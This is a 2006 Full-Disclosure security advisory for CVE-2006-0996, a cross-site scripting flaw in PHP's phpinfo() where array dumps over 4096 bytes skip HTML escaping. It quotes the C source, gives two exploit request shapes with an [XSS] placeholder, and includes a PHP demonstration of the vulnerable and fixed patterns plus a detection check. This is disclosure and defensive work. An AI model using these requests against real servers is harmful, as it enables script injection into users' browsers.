[Full-disclosure] phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2

2006-04-10 00:00:00
vulners.com

Source: http://securityreason.com/achievement_securityalert/34

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- Written: 26.2.2006
- Public: 8.4.2006
from SecurityReason.Com
CVE-2006-0996

--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write dynamically
generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the
PHP Conference Material is freely available.

--- 1. Cross Site Scripting ---
In phpinfo() you can see all variables, printed like this:

file: standard/info.c

--- 630-636 ---
php_print_gpcse_array("_REQUEST", sizeof("_REQUEST")-1 TSRMLS_CC);
php_print_gpcse_array("_GET", sizeof("_GET")-1 TSRMLS_CC);
php_print_gpcse_array("_POST", sizeof("_POST")-1 TSRMLS_CC);
php_print_gpcse_array("_FILES", sizeof("_FILES")-1 TSRMLS_CC);
php_print_gpcse_array("_COOKIE", sizeof("_COOKIE")-1 TSRMLS_CC);
php_print_gpcse_array("_SERVER", sizeof("_SERVER")-1 TSRMLS_CC);
php_print_gpcse_array("_ENV", sizeof("_ENV")-1 TSRMLS_CC);
--- 630-636 ---

For array values, the function php_print_gpcse_array() only checks (HTML-escapes) 4096 bytes of the variable.

file: standard/info.c

--- 135-154 ---
if (Z_TYPE_PP(tmp) == IS_ARRAY) {
    zval *tmp3;
    MAKE_STD_ZVAL(tmp3);
    if (!sapi_module.phpinfo_as_text) {
        PUTS("<pre>");
    }
    /* capture the array dump in an output buffer with a 4096-byte chunk size */
    php_start_ob_buffer(NULL, 4096, 1 TSRMLS_CC);
    zend_print_zval_r(*tmp, 0);
    /* tmp3 receives only what is still in the buffer at this point */
    php_ob_get_buffer(tmp3 TSRMLS_CC);
    php_end_ob_buffer(0, 0 TSRMLS_CC);

    /* escaping is applied to the captured buffer only */
    elem_esc = php_info_html_esc(Z_STRVAL_P(tmp3) TSRMLS_CC);
    PUTS(elem_esc);
    efree(elem_esc);
    zval_ptr_dtor(&tmp3);

    if (!sapi_module.phpinfo_as_text) {
        PUTS("</pre>");
    }
} else if (Z_TYPE_PP(tmp) != IS_STRING) {
--- 135-154 ---

So if we create an array whose dump is longer than 4096 bytes, the HTML tags in it are not removed.

Exploit:
If a PHP script calls phpinfo(), try creating some variables (arrays) like

phpinfo.php?cx[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][][][]=[XSS]

or

phpinfo.php?cx[]=ccccc…~4096chars…ccc[XSS]
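The following is an added example, not code from the advisory or from PHP itself. It models the bypass described above in userland PHP: ob_start($callback, $chunk_size) auto-flushes the buffer once it reaches $chunk_size bytes, which is the same behaviour info.c relies on with php_start_ob_buffer(NULL, 4096, 1), so any bytes flushed before the capture step never pass through the escaping call. The function names, the outer capture buffer standing in for the HTTP client, and the chunk-size-0 "fixed" variant are all assumptions made for the illustration; the fixed variant shows the defensive pattern (escape the complete dump, never a partially flushed buffer), not the exact upstream patch.

```php
<?php
// Added example (not the advisory's or PHP's own code): models how a chunked
// output buffer lets part of a phpinfo()-style array dump bypass escaping.

// Vulnerable pattern (mirrors info.c lines 135-154): capture with a chunked
// buffer, then escape only what is left in it.
function render_array_vulnerable(array $value): string
{
    ob_start();                        // outer buffer: stands in for the HTTP client
    ob_start(null, 4096);              // chunked capture buffer, as php_start_ob_buffer(NULL, 4096, 1)
    print_r($value);                   // stands in for zend_print_zval_r(); may trigger flushes
    $captured = ob_get_contents();     // only the bytes NOT flushed yet
    ob_end_clean();                    // discard remainder, as php_end_ob_buffer(0, 0)
    echo htmlspecialchars($captured, ENT_QUOTES, 'UTF-8');
    return ob_get_clean();             // raw flushed chunks + escaped tail
}

// Hardened pattern (assumption, defensive rewrite): a chunk size of 0 never
// auto-flushes, so the complete dump reaches the escaping step.
function render_array_fixed(array $value): string
{
    ob_start();                        // outer buffer: stands in for the HTTP client
    ob_start();                        // chunk_size 0: no automatic flush
    print_r($value);
    $captured = ob_get_clean();        // the whole dump, nothing lost
    echo htmlspecialchars($captured, ENT_QUOTES, 'UTF-8');
    return ob_get_clean();
}

// Detection check for the rendered page: did any raw HTML tag survive?
// print_r output itself never contains '<', and escaped tags become &lt;...&gt;.
function has_unescaped_tag(string $html): bool
{
    return (bool) preg_match('#</?[a-z][^>]*>#i', $html);
}

// Constructed inputs mirroring the advisory's two request shapes; the tag is
// a placeholder marker, not a real payload.
$marker = '<script>x</script>';
$short  = ['cx' => $marker];                              // under 4096 bytes: escaping works
$long   = ['cx' => [str_repeat('c', 4096) . $marker]];   // cx[]=ccc...~4096 chars...[XSS]
$nested = $marker;                                       // cx[][][]...[]=[XSS]
for ($i = 0; $i < 40; $i++) {
    $nested = [$nested];                                 // 40 nesting levels; print_r indentation pushes the dump past 4096 bytes
}
$nested = ['cx' => $nested];

foreach (['short' => $short, 'long' => $long, 'nested' => $nested] as $name => $input) {
    printf(
        "%-7s vulnerable: %-10s fixed: %s\n",
        $name,
        has_unescaped_tag(render_array_vulnerable($input)) ? 'TAG LEAKED' : 'escaped',
        has_unescaped_tag(render_array_fixed($input)) ? 'TAG LEAKED' : 'escaped'
    );
}
```

Run with the PHP CLI. The short input is escaped by both variants, which is why the defect only shows up with oversized arrays; the long and nested inputs leak the raw tag through render_array_vulnerable() because the dump is flushed past the capture before htmlspecialchars() runs, while render_array_fixed() escapes all three. Note that modern PHP writes the whole print_r() result in a single call, so with a chunked buffer the entire dump is flushed at once and the escaped tail is empty; PHP 5.1 wrote the dump piecemeal, but the outcome, a raw tag reaching the client, is the same.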

For: sp3x
and
p_e_a, pi3, eax ;]

iD8DBQFEOAIl3Ke13X/fTO4RAo4LAJ0fBxJWN64vWrDYJEuhGkqc/OC42QCbBxip
f35+6LHjuBoqP5D2JV84ufs=
=iz3m
-----END PGP SIGNATURE-----


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/